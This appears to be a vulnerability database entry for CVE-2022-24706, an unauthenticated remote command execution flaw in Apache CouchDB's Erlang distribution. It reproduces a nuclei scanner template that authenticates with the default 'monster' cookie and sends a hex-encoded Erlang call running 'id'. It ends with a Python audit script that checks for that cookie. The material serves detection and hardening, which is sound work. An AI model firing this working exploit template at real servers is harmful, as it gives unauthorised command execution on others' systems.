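Vulnerability Information
Vulnerability name: CouchDB Erlang Distribution - Remote Command Execution
Vulnerability ID:
Vulnerability type: Command execution
Severity: Critical
Description: Apache CouchDB is an open-source NoSQL database focused on ease of use and on being "a database that completely embraces the web". It is a document-oriented database that stores data in JSON format and is accessed through an HTTP API. CouchDB is widely used in enterprise and personal projects of all sizes and is popular for its ease of use and powerful synchronization features.
The vulnerability is in the Erlang distribution protocol of Apache CouchDB. Because security settings are not correctly configured in a default installation, an attacker can access the system without authenticating and gain administrator privileges. The technical root cause is the use of the default Erlang cookie value "monster", which lets an attacker bypass the authentication mechanism and execute arbitrary commands.
The impact of this vulnerability is extremely severe. An attacker can use it to execute arbitrary commands on an affected system, which may lead to data disclosure, service interruption, or further compromise of the system. Because the vulnerability allows unauthorized access and its exploitation can be automated, it poses a major threat to systems running affected versions of CouchDB. Users are advised to upgrade immediately to 3.2.2 or later to avoid potential security risks.
Vendor: apache
Product: couchdb
Affected versions: * < 3.2.2
Search syntax: product:"CouchDB" OR product:"couchdb" OR cpe:"cpe:2.3:a:apache:couchdb"
Source: https://github.com/projectdiscovery/nuclei-templates/blob/64a64b0937e369fef2cb769b4e48757616ecce15/network%2Fcves%2F2022%2FCVE-2022-24706.yaml
Type: projectdiscovery/nuclei-templates:github issues
POC Details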
id: CVE-2022-24706

info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x, NaN@korelogic
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
    - http://www.openwall.com/lists/oss-security/2022/04/26/1
    - http://www.openwall.com/lists/oss-security/2022/05/09/1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24706
    cwe-id: CWE-1188
    epss-score: 0.94412
    epss-percentile: 0.99975
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: apache
    product: couchdb
    shodan-query:
      - product:"CouchDB"
      - product:"couchdb"
      - cpe:"cpe:2.3:a:apache:couchdb"
  tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp

variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"

tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:{{Port}}"

    inputs:
      - data: "{{name_msg}}"
        type: hex
        read: 1024

      - read: 1024
        name: challenge

      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex

      - data: "{{cmd}}"
        type: hex
        read: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and
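
The root cause described above is a configuration default, so it can be checked on the host itself. The following audit is an added example, not part of the original template or of CouchDB: it assumes the node's Erlang flags live in a vm.args file that uses -setcookie and -kernel lines, the names audit_vm_args and parse_vm_args are hypothetical, and the loopback check assumes a single node with no remote cluster peers.

```python
import re

DEFAULT_COOKIE = "monster"   # default Erlang cookie named in the description above
FIXED_VERSION = (3, 2, 2)    # first release that refuses to start with that cookie

def parse_vm_args(text):
    """Map each '-flag' in an Erlang vm.args file to the list of its values."""
    flags = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # '#' starts a comment
        if line.startswith("-"):
            name, _, value = line.partition(" ")
            flags.setdefault(name, []).append(value.strip())
    return flags

def audit_vm_args(text, version):
    """Return a list of findings for one node (hypothetical helper)."""
    findings = []
    flags = parse_vm_args(text)
    if tuple(int(n) for n in re.findall(r"\d+", version)[:3]) < FIXED_VERSION:
        findings.append("version older than 3.2.2")
    cookies = [c.strip("'\"") for c in flags.get("-setcookie", [])]
    if not cookies:
        findings.append("no -setcookie flag: review the node's cookie file instead")
    elif DEFAULT_COOKIE in cookies:
        findings.append("default cookie 'monster' is configured")
    # Assumption: a single node that needs no remote peers binds distribution to loopback.
    kernel = " ".join(flags.get("-kernel", []))
    if not re.search(r"inet_dist_use_interface\s+\{127,0,0,1\}", kernel):
        findings.append("distribution listener not bound to loopback")
    return findings

# Constructed sample files, not taken from any real host.
WEAK = """\
-name couchdb@127.0.0.1
-setcookie monster   # shipped default
-kernel inet_dist_listen_min 9100
-kernel inet_dist_listen_max 9100
"""
HARDENED = """\
-name couchdb@127.0.0.1
-setcookie 'constructed-random-value-5f1c9a'
-kernel inet_dist_use_interface {127,0,0,1}
"""

if __name__ == "__main__":
    for label, text, ver in (("weak", WEAK, "3.2.1"), ("hardened", HARDENED, "3.3.3")):
        print(label, audit_vm_args(text, ver))
```

For clustered nodes that cannot bind to loopback, restrict the distribution port and epmd (TCP 4369) to cluster peers at the firewall.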